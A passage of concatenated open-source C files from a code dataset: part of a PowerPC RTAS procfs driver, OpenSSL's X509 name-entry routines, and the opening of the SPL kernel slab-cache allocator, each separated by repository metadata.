seq_printf(m, "Fan (rpm):\t");
break;
case IBM_VOLTAGE:
seq_printf(m, "Voltage (mv):\t");
break;
case IBM_DRCONNECTOR:
seq_printf(m, "DR connector:\t");
num_states = sizeof(ibm_drconnector) / sizeof(char *);
if (state < num_states) {
seq_printf(m, "%s\t",
ibm_drconnector[state]);
have_strings = 1;
}
break;
case IBM_POWERSUPPLY:
seq_printf(m, "Powersupply:\t");
break;
default:
seq_printf(m, "Unknown sensor (type %d), ignoring it\n",
s->token);
unknown = 1;
have_strings = 1;
break;
}
if (have_strings == 0) {
if (temperature) {
seq_printf(m, "%4d /%4d\t", state, cel_to_fahr(state));
} else
seq_printf(m, "%10d\t", state);
}
if (unknown == 0) {
seq_printf(m, "%s\t", ppc_rtas_process_error(error));
get_location_code(m, s, loc);
}
}
/* ****************************************************************** */
static void check_location(struct seq_file *m, const char *c)
{
switch (c[0]) {
case LOC_PLANAR:
seq_printf(m, "Planar #%c", c[1]);
break;
case LOC_CPU:
seq_printf(m, "CPU #%c", c[1]);
break;
case LOC_FAN:
seq_printf(m, "Fan #%c", c[1]);
break;
case LOC_RACKMOUNTED:
seq_printf(m, "Rack #%c", c[1]);
break;
case LOC_VOLTAGE:
seq_printf(m, "Voltage #%c", c[1]);
break;
case LOC_LCD:
seq_printf(m, "LCD #%c", c[1]);
break;
case '.':
seq_printf(m, "- %c", c[1]);
break;
default:
seq_printf(m, "Unknown location");
break;
}
}
/* ****************************************************************** */
/*
* Format:
* ${LETTER}${NUMBER}[[-/]${LETTER}${NUMBER} [ ... ] ]
* the '.' may be an abbrevation
*/
static void check_location_string(struct seq_file *m, const char *c)
{
while (*c) {
if (isalpha(*c) || *c == '.')
check_location(m, c);
else if (*c == '/' || *c == '-')
seq_printf(m, " at ");
c++;
}
}
/* ****************************************************************** */
static void get_location_code(struct seq_file *m, struct individual_sensor *s,
const char *loc)
{
if (!loc || !*loc) {
seq_printf(m, "---");/* does not have a location */
} else {
check_location_string(m, loc);
}
seq_putc(m, ' ');
}
/* ****************************************************************** */
/* INDICATORS - Tone Frequency */
/* ****************************************************************** */
static ssize_t ppc_rtas_tone_freq_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
unsigned long freq;
int error = parse_number(buf, count, &freq);
if (error)
return error;
rtas_tone_frequency = freq; /* save it for later */
error = rtas_call(rtas_token("set-indicator"), 3, 1, NULL,
TONE_FREQUENCY, 0, freq);
if (error)
printk(KERN_WARNING "error: setting tone frequency returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
static int ppc_rtas_tone_freq_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu\n", rtas_tone_frequency);
return 0;
}
/* ****************************************************************** */
/* INDICATORS - Tone Volume */
/* ****************************************************************** */
static ssize_t ppc_rtas_tone_volume_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
unsigned long volume;
int error = parse_number(buf, count, &volume);
if (error)
return error;
if (volume > 100)
volume = 100;
rtas_tone_volume = volume; /* save it for later */
error = rtas_call(rtas_token("set-indicator"), 3, 1, NULL,
TONE_VOLUME, 0, volume);
if (error)
printk(KERN_WARNING "error: setting tone volume returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
static int ppc_rtas_tone_volume_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu\n", rtas_tone_volume);
return 0;
}
#define RMO_READ_BUF_MAX 30
/* RTAS Userspace access */
static int ppc_rtas_rmo_buf_show(struct seq_file *m, void *v)
{
seq_printf(m, "%016lx %x\n", rtas_rmo_buf, RTAS_RMOBUF_MAX);
return 0;
}
| gpl-2.0 |
hajuuk/R7000 | ap/gpl/transmission/openssl/crypto/x509/x509name.c | 2 | 10762 | /* crypto/x509/x509name.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <openssl/stack.h>
#include "cryptlib.h"
#include <openssl/asn1.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/x509.h>
int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf, int len)
{
ASN1_OBJECT *obj;
obj=OBJ_nid2obj(nid);
if (obj == NULL) return(-1);
return(X509_NAME_get_text_by_OBJ(name,obj,buf,len));
}
int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, char *buf,
int len)
{
int i;
ASN1_STRING *data;
i=X509_NAME_get_index_by_OBJ(name,obj,-1);
if (i < 0) return(-1);
data=X509_NAME_ENTRY_get_data(X509_NAME_get_entry(name,i));
i=(data->length > (len-1))?(len-1):data->length;
if (buf == NULL) return(data->length);
memcpy(buf,data->data,i);
buf[i]='\0';
return(i);
}
int X509_NAME_entry_count(X509_NAME *name)
{
if (name == NULL) return(0);
return(sk_X509_NAME_ENTRY_num(name->entries));
}
int X509_NAME_get_index_by_NID(X509_NAME *name, int nid, int lastpos)
{
ASN1_OBJECT *obj;
obj=OBJ_nid2obj(nid);
if (obj == NULL) return(-2);
return(X509_NAME_get_index_by_OBJ(name,obj,lastpos));
}
/* NOTE: you should be passsing -1, not 0 as lastpos */
int X509_NAME_get_index_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
int lastpos)
{
int n;
X509_NAME_ENTRY *ne;
STACK_OF(X509_NAME_ENTRY) *sk;
if (name == NULL) return(-1);
if (lastpos < 0)
lastpos= -1;
sk=name->entries;
n=sk_X509_NAME_ENTRY_num(sk);
for (lastpos++; lastpos < n; lastpos++)
{
ne=sk_X509_NAME_ENTRY_value(sk,lastpos);
if (OBJ_cmp(ne->object,obj) == 0)
return(lastpos);
}
return(-1);
}
X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc)
{
if(name == NULL || sk_X509_NAME_ENTRY_num(name->entries) <= loc
|| loc < 0)
return(NULL);
else
return(sk_X509_NAME_ENTRY_value(name->entries,loc));
}
X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc)
{
X509_NAME_ENTRY *ret;
int i,n,set_prev,set_next;
STACK_OF(X509_NAME_ENTRY) *sk;
if (name == NULL || sk_X509_NAME_ENTRY_num(name->entries) <= loc
|| loc < 0)
return(NULL);
sk=name->entries;
ret=sk_X509_NAME_ENTRY_delete(sk,loc);
n=sk_X509_NAME_ENTRY_num(sk);
name->modified=1;
if (loc == n) return(ret);
/* else we need to fixup the set field */
if (loc != 0)
set_prev=(sk_X509_NAME_ENTRY_value(sk,loc-1))->set;
else
set_prev=ret->set-1;
set_next=sk_X509_NAME_ENTRY_value(sk,loc)->set;
/* set_prev is the previous set
* set is the current set
* set_next is the following
* prev 1 1 1 1 1 1 1 1
* set 1 1 2 2
* next 1 1 2 2 2 2 3 2
* so basically only if prev and next differ by 2, then
* re-number down by 1 */
if (set_prev+1 < set_next)
for (i=loc; i<n; i++)
sk_X509_NAME_ENTRY_value(sk,i)->set--;
return(ret);
}
int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
unsigned char *bytes, int len, int loc, int set)
{
X509_NAME_ENTRY *ne;
int ret;
ne = X509_NAME_ENTRY_create_by_OBJ(NULL, obj, type, bytes, len);
if(!ne) return 0;
ret = X509_NAME_add_entry(name, ne, loc, set);
X509_NAME_ENTRY_free(ne);
return ret;
}
int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
unsigned char *bytes, int len, int loc, int set)
{
X509_NAME_ENTRY *ne;
int ret;
ne = X509_NAME_ENTRY_create_by_NID(NULL, nid, type, bytes, len);
if(!ne) return 0;
ret = X509_NAME_add_entry(name, ne, loc, set);
X509_NAME_ENTRY_free(ne);
return ret;
}
int X509_NAME_add_entry_by_txt(X509_NAME *name, char *field, int type,
unsigned char *bytes, int len, int loc, int set)
{
X509_NAME_ENTRY *ne;
int ret;
ne = X509_NAME_ENTRY_create_by_txt(NULL, field, type, bytes, len);
if(!ne) return 0;
ret = X509_NAME_add_entry(name, ne, loc, set);
X509_NAME_ENTRY_free(ne);
return ret;
}
/* if set is -1, append to previous set, 0 'a new one', and 1,
* prepend to the guy we are about to stomp on. */
int X509_NAME_add_entry(X509_NAME *name, X509_NAME_ENTRY *ne, int loc,
int set)
{
X509_NAME_ENTRY *new_name=NULL;
int n,i,inc;
STACK_OF(X509_NAME_ENTRY) *sk;
if (name == NULL) return(0);
sk=name->entries;
n=sk_X509_NAME_ENTRY_num(sk);
if (loc > n) loc=n;
else if (loc < 0) loc=n;
name->modified=1;
if (set == -1)
{
if (loc == 0)
{
set=0;
inc=1;
}
else
{
set=sk_X509_NAME_ENTRY_value(sk,loc-1)->set;
inc=0;
}
}
else /* if (set >= 0) */
{
if (loc >= n)
{
if (loc != 0)
set=sk_X509_NAME_ENTRY_value(sk,loc-1)->set+1;
else
set=0;
}
else
set=sk_X509_NAME_ENTRY_value(sk,loc)->set;
inc=(set == 0)?1:0;
}
if ((new_name=X509_NAME_ENTRY_dup(ne)) == NULL)
goto err;
new_name->set=set;
if (!sk_X509_NAME_ENTRY_insert(sk,new_name,loc))
{
X509err(X509_F_X509_NAME_ADD_ENTRY,ERR_R_MALLOC_FAILURE);
goto err;
}
if (inc)
{
n=sk_X509_NAME_ENTRY_num(sk);
for (i=loc+1; i<n; i++)
sk_X509_NAME_ENTRY_value(sk,i-1)->set+=1;
}
return(1);
err:
if (new_name != NULL)
X509_NAME_ENTRY_free(new_name);
return(0);
}
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
char *field, int type, unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *nentry;
obj=OBJ_txt2obj(field, 0);
if (obj == NULL)
{
X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_TXT,
X509_R_INVALID_FIELD_NAME);
ERR_add_error_data(2, "name=", field);
return(NULL);
}
nentry = X509_NAME_ENTRY_create_by_OBJ(ne,obj,type,bytes,len);
ASN1_OBJECT_free(obj);
return nentry;
}
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
int type, unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *nentry;
obj=OBJ_nid2obj(nid);
if (obj == NULL)
{
X509err(X509_F_X509_NAME_ENTRY_CREATE_BY_NID,X509_R_UNKNOWN_NID);
return(NULL);
}
nentry = X509_NAME_ENTRY_create_by_OBJ(ne,obj,type,bytes,len);
ASN1_OBJECT_free(obj);
return nentry;
}
X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
ASN1_OBJECT *obj, int type, unsigned char *bytes, int len)
{
X509_NAME_ENTRY *ret;
if ((ne == NULL) || (*ne == NULL))
{
if ((ret=X509_NAME_ENTRY_new()) == NULL)
return(NULL);
}
else
ret= *ne;
if (!X509_NAME_ENTRY_set_object(ret,obj))
goto err;
if (!X509_NAME_ENTRY_set_data(ret,type,bytes,len))
goto err;
if ((ne != NULL) && (*ne == NULL)) *ne=ret;
return(ret);
err:
if ((ne == NULL) || (ret != *ne))
X509_NAME_ENTRY_free(ret);
return(NULL);
}
int X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne, ASN1_OBJECT *obj)
{
if ((ne == NULL) || (obj == NULL))
{
X509err(X509_F_X509_NAME_ENTRY_SET_OBJECT,ERR_R_PASSED_NULL_PARAMETER);
return(0);
}
ASN1_OBJECT_free(ne->object);
ne->object=OBJ_dup(obj);
return((ne->object == NULL)?0:1);
}
int X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
unsigned char *bytes, int len)
{
int i;
if ((ne == NULL) || ((bytes == NULL) && (len != 0))) return(0);
if((type > 0) && (type & MBSTRING_FLAG))
return ASN1_STRING_set_by_NID(&ne->value, bytes,
len, type,
OBJ_obj2nid(ne->object)) ? 1 : 0;
if (len < 0) len=strlen((char *)bytes);
i=ASN1_STRING_set(ne->value,bytes,len);
if (!i) return(0);
if (type != V_ASN1_UNDEF)
{
if (type == V_ASN1_APP_CHOOSE)
ne->value->type=ASN1_PRINTABLE_type(bytes,len);
else
ne->value->type=type;
}
return(1);
}
ASN1_OBJECT *X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne)
{
if (ne == NULL) return(NULL);
return(ne->object);
}
ASN1_STRING *X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne)
{
if (ne == NULL) return(NULL);
return(ne->value);
}
| gpl-2.0 |
coldnew/linux | spl/spl/spl-kmem-cache.c | 2 | 50473 | /*
* Copyright (C) 2007-2010 Lawrence Livermore National Security, LLC.
* Copyright (C) 2007 The Regents of the University of California.
* Produced at Lawrence Livermore National Laboratory (cf, DISCLAIMER).
* Written by Brian Behlendorf <behlendorf1@llnl.gov>.
* UCRL-CODE-235197
*
* This file is part of the SPL, Solaris Porting Layer.
* For details, see <http://zfsonlinux.org/>.
*
* The SPL is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* The SPL is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* for more details.
*
* You should have received a copy of the GNU General Public License along
* with the SPL. If not, see <http://www.gnu.org/licenses/>.
*/
#include <sys/kmem.h>
#include <sys/kmem_cache.h>
#include <sys/taskq.h>
#include <sys/timer.h>
#include <sys/vmem.h>
#include <linux/slab.h>
#include <linux/swap.h>
#include <linux/mm_compat.h>
#include <linux/wait_compat.h>
/*
* Within the scope of spl-kmem.c file the kmem_cache_* definitions
* are removed to allow access to the real Linux slab allocator.
*/
#undef kmem_cache_destroy
#undef kmem_cache_create
#undef kmem_cache_alloc
#undef kmem_cache_free
/*
* Linux 3.16 replaced smp_mb__{before,after}_{atomic,clear}_{dec,inc,bit}()
* with smp_mb__{before,after}_atomic() because they were redundant. This is
* only used inside our SLAB allocator, so we implement an internal wrapper
* here to give us smp_mb__{before,after}_atomic() on older kernels.
*/
#ifndef smp_mb__before_atomic
#define smp_mb__before_atomic(x) smp_mb__before_clear_bit(x)
#endif
#ifndef smp_mb__after_atomic
#define smp_mb__after_atomic(x) smp_mb__after_clear_bit(x)
#endif
/*
* Cache expiration was implemented because it was part of the default Solaris
* kmem_cache behavior. The idea is that per-cpu objects which haven't been
* accessed in several seconds should be returned to the cache. On the other
* hand Linux slabs never move objects back to the slabs unless there is
* memory pressure on the system. By default the Linux method is enabled
* because it has been shown to improve responsiveness on low memory systems.
* This policy may be changed by setting KMC_EXPIRE_AGE or KMC_EXPIRE_MEM.
*/
unsigned int spl_kmem_cache_expire = KMC_EXPIRE_MEM;
EXPORT_SYMBOL(spl_kmem_cache_expire);
module_param(spl_kmem_cache_expire, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_expire, "By age (0x1) or low memory (0x2)");
/*
* Cache magazines are an optimization designed to minimize the cost of
* allocating memory. They do this by keeping a per-cpu cache of recently
* freed objects, which can then be reallocated without taking a lock. This
* can improve performance on highly contended caches. However, because
* objects in magazines will prevent otherwise empty slabs from being
* immediately released this may not be ideal for low memory machines.
*
* For this reason spl_kmem_cache_magazine_size can be used to set a maximum
* magazine size. When this value is set to 0 the magazine size will be
* automatically determined based on the object size. Otherwise magazines
* will be limited to 2-256 objects per magazine (i.e per cpu). Magazines
* may never be entirely disabled in this implementation.
*/
unsigned int spl_kmem_cache_magazine_size = 0;
module_param(spl_kmem_cache_magazine_size, uint, 0444);
MODULE_PARM_DESC(spl_kmem_cache_magazine_size,
"Default magazine size (2-256), set automatically (0)\n");
/*
* The default behavior is to report the number of objects remaining in the
* cache. This allows the Linux VM to repeatedly reclaim objects from the
* cache when memory is low satisfy other memory allocations. Alternately,
* setting this value to KMC_RECLAIM_ONCE limits how aggressively the cache
* is reclaimed. This may increase the likelihood of out of memory events.
*/
unsigned int spl_kmem_cache_reclaim = 0 /* KMC_RECLAIM_ONCE */;
module_param(spl_kmem_cache_reclaim, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_reclaim, "Single reclaim pass (0x1)");
unsigned int spl_kmem_cache_obj_per_slab = SPL_KMEM_CACHE_OBJ_PER_SLAB;
module_param(spl_kmem_cache_obj_per_slab, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_obj_per_slab, "Number of objects per slab");
unsigned int spl_kmem_cache_obj_per_slab_min = SPL_KMEM_CACHE_OBJ_PER_SLAB_MIN;
module_param(spl_kmem_cache_obj_per_slab_min, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_obj_per_slab_min,
"Minimal number of objects per slab");
unsigned int spl_kmem_cache_max_size = SPL_KMEM_CACHE_MAX_SIZE;
module_param(spl_kmem_cache_max_size, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_max_size, "Maximum size of slab in MB");
/*
* For small objects the Linux slab allocator should be used to make the most
* efficient use of the memory. However, large objects are not supported by
* the Linux slab and therefore the SPL implementation is preferred. A cutoff
* of 16K was determined to be optimal for architectures using 4K pages.
*/
#if PAGE_SIZE == 4096
unsigned int spl_kmem_cache_slab_limit = 16384;
#else
unsigned int spl_kmem_cache_slab_limit = 0;
#endif
module_param(spl_kmem_cache_slab_limit, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_slab_limit,
"Objects less than N bytes use the Linux slab");
/*
* This value defaults to a threshold designed to avoid allocations which
* have been deemed costly by the kernel.
*/
unsigned int spl_kmem_cache_kmem_limit =
((1 << (PAGE_ALLOC_COSTLY_ORDER - 1)) * PAGE_SIZE) /
SPL_KMEM_CACHE_OBJ_PER_SLAB;
module_param(spl_kmem_cache_kmem_limit, uint, 0644);
MODULE_PARM_DESC(spl_kmem_cache_kmem_limit,
"Objects less than N bytes use the kmalloc");
/*
* The number of threads available to allocate new slabs for caches. This
* should not need to be tuned but it is available for performance analysis.
*/
unsigned int spl_kmem_cache_kmem_threads = 4;
module_param(spl_kmem_cache_kmem_threads, uint, 0444);
MODULE_PARM_DESC(spl_kmem_cache_kmem_threads,
"Number of spl_kmem_cache threads");
/*
* Slab allocation interfaces
*
* While the Linux slab implementation was inspired by the Solaris
* implementation I cannot use it to emulate the Solaris APIs. I
* require two features which are not provided by the Linux slab.
*
* 1) Constructors AND destructors. Recent versions of the Linux
* kernel have removed support for destructors. This is a deal
* breaker for the SPL which contains particularly expensive
* initializers for mutex's, condition variables, etc. We also
* require a minimal level of cleanup for these data types unlike
* many Linux data types which do need to be explicitly destroyed.
*
* 2) Virtual address space backed slab. Callers of the Solaris slab
* expect it to work well for both small are very large allocations.
* Because of memory fragmentation the Linux slab which is backed
* by kmalloc'ed memory performs very badly when confronted with
* large numbers of large allocations. Basing the slab on the
* virtual address space removes the need for contiguous pages
* and greatly improve performance for large allocations.
*
* For these reasons, the SPL has its own slab implementation with
* the needed features. It is not as highly optimized as either the
* Solaris or Linux slabs, but it should get me most of what is
* needed until it can be optimized or obsoleted by another approach.
*
* One serious concern I do have about this method is the relatively
* small virtual address space on 32bit arches. This will seriously
* constrain the size of the slab caches and their performance.
*/
struct list_head spl_kmem_cache_list; /* List of caches */
struct rw_semaphore spl_kmem_cache_sem; /* Cache list lock */
taskq_t *spl_kmem_cache_taskq; /* Task queue for ageing / reclaim */
static void spl_cache_shrink(spl_kmem_cache_t *skc, void *obj);
SPL_SHRINKER_CALLBACK_FWD_DECLARE(spl_kmem_cache_generic_shrinker);
SPL_SHRINKER_DECLARE(spl_kmem_cache_shrinker,
spl_kmem_cache_generic_shrinker, KMC_DEFAULT_SEEKS);
static void *
kv_alloc(spl_kmem_cache_t *skc, int size, int flags)
{
gfp_t lflags = kmem_flags_convert(flags);
void *ptr;
if (skc->skc_flags & KMC_KMEM) {
ASSERT(ISP2(size));
ptr = (void *)__get_free_pages(lflags, get_order(size));
} else {
ptr = spl_vmalloc(size, lflags | __GFP_HIGHMEM, PAGE_KERNEL);
}
/* Resulting allocated memory will be page aligned */
ASSERT(IS_P2ALIGNED(ptr, PAGE_SIZE));
return (ptr);
}
static void
kv_free(spl_kmem_cache_t *skc, void *ptr, int size)
{
ASSERT(IS_P2ALIGNED(ptr, PAGE_SIZE));
/*
* The Linux direct reclaim path uses this out of band value to
* determine if forward progress is being made. Normally this is
* incremented by kmem_freepages() which is part of the various
* Linux slab implementations. However, since we are using none
* of that infrastructure we are responsible for incrementing it.
*/
if (current->reclaim_state)
current->reclaim_state->reclaimed_slab += size >> PAGE_SHIFT;
if (skc->skc_flags & KMC_KMEM) {
ASSERT(ISP2(size));
free_pages((unsigned long)ptr, get_order(size));
} else {
vfree(ptr);
}
}
/*
* Required space for each aligned sks.
*/
static inline uint32_t
spl_sks_size(spl_kmem_cache_t *skc)
{
return (P2ROUNDUP_TYPED(sizeof (spl_kmem_slab_t),
skc->skc_obj_align, uint32_t));
}
/*
* Required space for each aligned object.
*/
static inline uint32_t
spl_obj_size(spl_kmem_cache_t *skc)
{
uint32_t align = skc->skc_obj_align;
return (P2ROUNDUP_TYPED(skc->skc_obj_size, align, uint32_t) +
P2ROUNDUP_TYPED(sizeof (spl_kmem_obj_t), align, uint32_t));
}
/*
* Lookup the spl_kmem_object_t for an object given that object.
*/
static inline spl_kmem_obj_t *
spl_sko_from_obj(spl_kmem_cache_t *skc, void *obj)
{
return (obj + P2ROUNDUP_TYPED(skc->skc_obj_size,
skc->skc_obj_align, uint32_t));
}
/*
* Required space for each offslab object taking in to account alignment
* restrictions and the power-of-two requirement of kv_alloc().
*/
static inline uint32_t
spl_offslab_size(spl_kmem_cache_t *skc)
{
return (1UL << (fls64(spl_obj_size(skc)) + 1));
}
/*
* It's important that we pack the spl_kmem_obj_t structure and the
* actual objects in to one large address space to minimize the number
* of calls to the allocator. It is far better to do a few large
* allocations and then subdivide it ourselves. Now which allocator
* we use requires balancing a few trade offs.
*
* For small objects we use kmem_alloc() because as long as you are
* only requesting a small number of pages (ideally just one) its cheap.
* However, when you start requesting multiple pages with kmem_alloc()
* it gets increasingly expensive since it requires contiguous pages.
* For this reason we shift to vmem_alloc() for slabs of large objects
* which removes the need for contiguous pages. We do not use
* vmem_alloc() in all cases because there is significant locking
* overhead in __get_vm_area_node(). This function takes a single
* global lock when acquiring an available virtual address range which
* serializes all vmem_alloc()'s for all slab caches. Using slightly
* different allocation functions for small and large objects should
* give us the best of both worlds.
*
* KMC_ONSLAB KMC_OFFSLAB
*
* +------------------------+ +-----------------+
* | spl_kmem_slab_t --+-+ | | spl_kmem_slab_t |---+-+
* | skc_obj_size <-+ | | +-----------------+ | |
* | spl_kmem_obj_t | | | |
* | skc_obj_size <---+ | +-----------------+ | |
* | spl_kmem_obj_t | | | skc_obj_size | <-+ |
* | ... v | | spl_kmem_obj_t | |
* +------------------------+ +-----------------+ v
*/
static spl_kmem_slab_t *
spl_slab_alloc(spl_kmem_cache_t *skc, int flags)
{
spl_kmem_slab_t *sks;
spl_kmem_obj_t *sko, *n;
void *base, *obj;
uint32_t obj_size, offslab_size = 0;
int i, rc = 0;
base = kv_alloc(skc, skc->skc_slab_size, flags);
if (base == NULL)
return (NULL);
sks = (spl_kmem_slab_t *)base;
sks->sks_magic = SKS_MAGIC;
sks->sks_objs = skc->skc_slab_objs;
sks->sks_age = jiffies;
sks->sks_cache = skc;
INIT_LIST_HEAD(&sks->sks_list);
INIT_LIST_HEAD(&sks->sks_free_list);
sks->sks_ref = 0;
obj_size = spl_obj_size(skc);
if (skc->skc_flags & KMC_OFFSLAB)
offslab_size = spl_offslab_size(skc);
for (i = 0; i < sks->sks_objs; i++) {
if (skc->skc_flags & KMC_OFFSLAB) {
obj = kv_alloc(skc, offslab_size, flags);
if (!obj) {
rc = -ENOMEM;
goto out;
}
} else {
obj = base + spl_sks_size(skc) + (i * obj_size);
}
ASSERT(IS_P2ALIGNED(obj, skc->skc_obj_align));
sko = spl_sko_from_obj(skc, obj);
sko->sko_addr = obj;
sko->sko_magic = SKO_MAGIC;
sko->sko_slab = sks;
INIT_LIST_HEAD(&sko->sko_list);
list_add_tail(&sko->sko_list, &sks->sks_free_list);
}
out:
if (rc) {
if (skc->skc_flags & KMC_OFFSLAB)
list_for_each_entry_safe(sko,
n, &sks->sks_free_list, sko_list)
kv_free(skc, sko->sko_addr, offslab_size);
kv_free(skc, base, skc->skc_slab_size);
sks = NULL;
}
return (sks);
}
/*
* Remove a slab from complete or partial list, it must be called with
* the 'skc->skc_lock' held but the actual free must be performed
* outside the lock to prevent deadlocking on vmem addresses.
*/
static void
spl_slab_free(spl_kmem_slab_t *sks,
struct list_head *sks_list, struct list_head *sko_list)
{
spl_kmem_cache_t *skc;
ASSERT(sks->sks_magic == SKS_MAGIC);
ASSERT(sks->sks_ref == 0);
skc = sks->sks_cache;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
/*
* Update slab/objects counters in the cache, then remove the
* slab from the skc->skc_partial_list. Finally add the slab
* and all its objects in to the private work lists where the
* destructors will be called and the memory freed to the system.
*/
skc->skc_obj_total -= sks->sks_objs;
skc->skc_slab_total--;
list_del(&sks->sks_list);
list_add(&sks->sks_list, sks_list);
list_splice_init(&sks->sks_free_list, sko_list);
}
/*
* Reclaim empty slabs at the end of the partial list.
*/
static void
spl_slab_reclaim(spl_kmem_cache_t *skc)
{
spl_kmem_slab_t *sks, *m;
spl_kmem_obj_t *sko, *n;
LIST_HEAD(sks_list);
LIST_HEAD(sko_list);
uint32_t size = 0;
/*
* Empty slabs and objects must be moved to a private list so they
* can be safely freed outside the spin lock. All empty slabs are
* at the end of skc->skc_partial_list, therefore once a non-empty
* slab is found we can stop scanning.
*/
spin_lock(&skc->skc_lock);
list_for_each_entry_safe_reverse(sks, m,
&skc->skc_partial_list, sks_list) {
if (sks->sks_ref > 0)
break;
spl_slab_free(sks, &sks_list, &sko_list);
}
spin_unlock(&skc->skc_lock);
/*
* The following two loops ensure all the object destructors are
* run, any offslab objects are freed, and the slabs themselves
* are freed. This is all done outside the skc->skc_lock since
* this allows the destructor to sleep, and allows us to perform
* a conditional reschedule when a freeing a large number of
* objects and slabs back to the system.
*/
if (skc->skc_flags & KMC_OFFSLAB)
size = spl_offslab_size(skc);
list_for_each_entry_safe(sko, n, &sko_list, sko_list) {
ASSERT(sko->sko_magic == SKO_MAGIC);
if (skc->skc_flags & KMC_OFFSLAB)
kv_free(skc, sko->sko_addr, size);
}
list_for_each_entry_safe(sks, m, &sks_list, sks_list) {
ASSERT(sks->sks_magic == SKS_MAGIC);
kv_free(skc, sks, skc->skc_slab_size);
}
}
static spl_kmem_emergency_t *
spl_emergency_search(struct rb_root *root, void *obj)
{
struct rb_node *node = root->rb_node;
spl_kmem_emergency_t *ske;
unsigned long address = (unsigned long)obj;
while (node) {
ske = container_of(node, spl_kmem_emergency_t, ske_node);
if (address < ske->ske_obj)
node = node->rb_left;
else if (address > ske->ske_obj)
node = node->rb_right;
else
return (ske);
}
return (NULL);
}
static int
spl_emergency_insert(struct rb_root *root, spl_kmem_emergency_t *ske)
{
struct rb_node **new = &(root->rb_node), *parent = NULL;
spl_kmem_emergency_t *ske_tmp;
unsigned long address = ske->ske_obj;
while (*new) {
